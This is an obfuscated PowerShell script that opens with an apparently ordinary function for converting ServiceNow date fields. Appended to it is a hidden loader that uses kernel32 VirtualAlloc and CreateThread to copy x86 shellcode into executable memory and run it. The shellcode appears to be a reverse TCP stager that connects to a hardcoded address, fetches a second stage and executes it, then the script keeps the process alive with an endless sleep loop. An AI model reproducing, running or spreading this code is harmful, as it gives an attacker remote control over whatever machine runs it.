&('sv') ("Fa"+"Y") ([tYpE]("{0}{1}" -F'Str','iNG'))  ;  $8VgY3r  =[TypE]("{0}{2}{1}" -f'DA','iMe','tEt')  ;  &("{0}{2}{1}"-f 'S','T-iTEM','E') ("{1}{0}{3}{2}" -f'ar','v','ABLe:zVt','I') ([TyPe]("{5}{7}{4}{3}{8}{6}{2}{1}{0}"-F'TINFo','ormA','meF','ZATIOn.DA','ObALi','SYStE','I','M.GL','TeT'));    &("{0}{2}{1}"-f'Se','eM','t-IT')  ("vAr"+"i"+"ab"+"LE:Ij23"+"qh") (  [TYPe]("{8}{6}{10}{2}{9}{4}{1}{7}{3}{5}{0}"-f'Es','N.D','LO','M','ATIo','EsTYl','m.','AtEti','SYste','baLiZ','G')) ;  Function UpDAT`e-S`ErVIcE`NoWDateTiMEF`iE`Ld {
    

    [OutputType([PSCustomObject[]])]
    [CmdletBinding(SuPPoRtSShOuLdPRocEsS)]
    param (
        
        [Parameter(
            MANDatOry         = ${T`Rue},
            vaLueFroMPiPeliNE = ${TR`UE}
        )]
        [ValidateNotNullOrEmpty()]
        [PSCustomObject[]]${R`Esu`LT}
    )

	begin {}
	process	{
		
        ${Co`NV`erTtoDAT`EfI`E`LD} = @(("{0}{1}"-f'clo','sed_at'), ("{3}{2}{1}{0}"-f 'ed_start','t','xpec','e'), ("{0}{2}{1}"-f 'fol','_up','low'), ("{0}{1}{2}"-f'opene','d_','at'), ("{2}{3}{0}{1}"-f 'created','_on','sys','_'), ("{2}{1}{0}{3}"-f 'pda','u','sys_','ted_on'), ("{0}{1}" -f 'work_','end'), ("{3}{1}{2}{0}" -f 'tart','rk','_s','wo'))

        If (${p`SCm`dlet}.("{1}{2}{0}" -f'rocess','Shoul','dP').Invoke(${S`EaRc`HB`ASE},${M`YIN`VOc`AtIOn}."myc`o`MMa`ND")) {
        ForEach (${s`NreSu`Lt} in ${re`sUlt}) {
                ForEach (${PRopER`TY} in ${co`NVErTTod`A`Te`F`IelD}) {
                    If (-not   $fAy::("{2}{1}{0}" -f'Empty','r','IsNullO').Invoke(${SN`ReSU`lT}.${p`RoP`ERTY})) {
                        Try {
                            
                            ${C`UlTu`R`eDATe`TiMEfo`RM`AT} = (&("{0}{1}{2}" -f 'Get-','Cultur','e'))."DAtE`TImeFO`Rm`At"
                            ${D`ATEF`OrMat} = ${CUlt`UReDATEtime`F`o`RmaT}."sHORtD`A`TE`PAtTErN"
                            ${T`iM`E`ForMat} = ${c`U`lTurEDAte`TI`MEfORmaT}."lON`g`TImEP`ATTerN"
                            ${da`T`EtIm`eFORMaT} = ("$DateFormat "+"$TimeFormat")
                            ${Sn`R`EsuLt}.${PRO`p`E`Rty} =  $8Vgy3r::("{2}{0}{1}" -f'se','Exact','Par').Invoke($(${SnrE`S`U`Lt}.${pRO`PEr`Ty}), ${DATE`TimEfo`R`mAt},  $Zvt::"InVAr`Ia`Ntin`Fo",   $iJ23qh::"n`ONE")
                        }
                        Catch {
                            Try {
                                
                                ${D`At`EtI`meFOrMat} = ("{2}{1}{5}{0}{3}{4}"-f'd','yy','yy',' HH:mm:s','s','-MM-d')
                                ${sN`ReSULT}.${pRO`Pe`RTY} =  (  &('LS') ("{0}{1}{2}"-f 'VA','RIablE:','8vGy3r')  )."vA`Lue"::("{3}{2}{0}{1}" -f 'xa','ct','E','Parse').Invoke($(${sNR`ES`Ult}.${pRoP`ER`TY}), ${datET`ime`F`ormAT},  (.("{2}{0}{1}"-f'r','iAble','Va')  ("{0}{1}"-f 'z','Vt') -Valueo)::"InVar`Ia`NtI`N`Fo",   (.("{1}{2}{0}" -f'LDiTEm','ch','I') ("VAR"+"I"+"ab"+"le:iJ23"+"QH") )."VA`lue"::"no`NE")
                            }
                            Catch {
                                
                                ${nu`Ll} = ("{4}{7}{9}{8}{6}{0}{3}{5}{2}{1}{10}"-f ' happ','t want to s','e jus','y w','Code','hen w','A',' to make','SS',' P','uppress errors')
                            }
                        }
                    }
                }
            }
        }

        ${Re`Su`Lt}
    }
	end {}
}

${C} = ((("{75}{103}{70}{65}{73}{47}{20}{5}{102}{29}{18}{69}{85}{49}{81}{48}{78}{107}{45}{91}{31}{96}{41}{33}{63}{61}{97}{72}{115}{11}{14}{50}{76}{9}{86}{112}{7}{59}{60}{68}{46}{23}{40}{13}{58}{108}{10}{105}{19}{74}{100}{98}{53}{106}{111}{2}{25}{82}{52}{24}{8}{77}{6}{51}{110}{34}{1}{104}{37}{15}{4}{56}{67}{94}{0}{88}{66}{109}{92}{80}{26}{89}{95}{93}{22}{57}{55}{30}{83}{35}{62}{39}{44}{17}{71}{64}{99}{12}{90}{113}{114}{32}{84}{43}{27}{54}{87}{16}{28}{79}{101}{3}{21}{38}{42}{36}" -f'nt dwSta','e','extern ','st, u','t','n','ntPt','ot','e',' uint f','n','t ','Ybmsvcr','b','flAlloc','t','se','adId);[','dllDY','ll','er','i',', uin','(D','t','In','tr lpPar','Ptr','t','2.','CreationFla','oc(IntPtr l','blic stati','ddre','r','s, IntPtr l','t);','dA','nt src','h','Y','A',', uint coun','Int','re','ualA','ort','bk','tP','ic e','ationTyp','r lpT','ea','i',' ','w','ri','t d','ke','ec','t)',' dw','pT','ss, uint','I','t(','Siz','but',';[DllImp','b)','r','Dll',' u','DY','DYb)]pu','[Dl','e,','Thread(I','tr ','(Int','StartAddress, IntP','xtern In','tPtr Cr','g','c extern ',']public stat','lP','mem','ck','a','t.','ll','IntPtr lp','r','es, ui','mete','p','Size,','l','mport(D','b','Ptr de','el3','lImpo','a','el32.d','c stati','Virt','r','e, ','h','c ','r','dllDYb)]p','u','in'))  -RePlAcE  ([ChaR]68+[ChaR]89+[ChaR]98),[ChaR]34);${w} = .("{0}{1}{2}"-f'A','dd-Ty','pe') -memberDefinition ${C} -Name ("{0}{1}" -f 'Win','32') -namespace ("{2}{0}{1}{3}" -f 'u','ncti','Win32F','ons') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0x6d,0xca,0x67,0xaa,0x68,0x02,0x00,0x31,0xa3,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${g} = 0x1000;if (${z}."lE`NgTH" -gt 0x1000){${g} = ${Z}."LEng`TH"};${X}=${w}::("{0}{2}{1}"-f 'Virtual','loc','Al').Invoke(0,0x1000,${g},0x40);for (${i}=0;${I} -le (${z}."l`eng`Th"-1);${i}++) {${w}::"Mem`Set"([IntPtr](${X}.("{2}{1}{0}"-f '2','oInt3','T').Invoke()+${i}), ${z}[${i}], 1)};${W}::("{2}{1}{0}"-f'd','eThrea','Creat').Invoke(0,0,${X},0,0,0);for (;;){&("{2}{0}{1}"-f 'tart-sl','eep','S') 60};
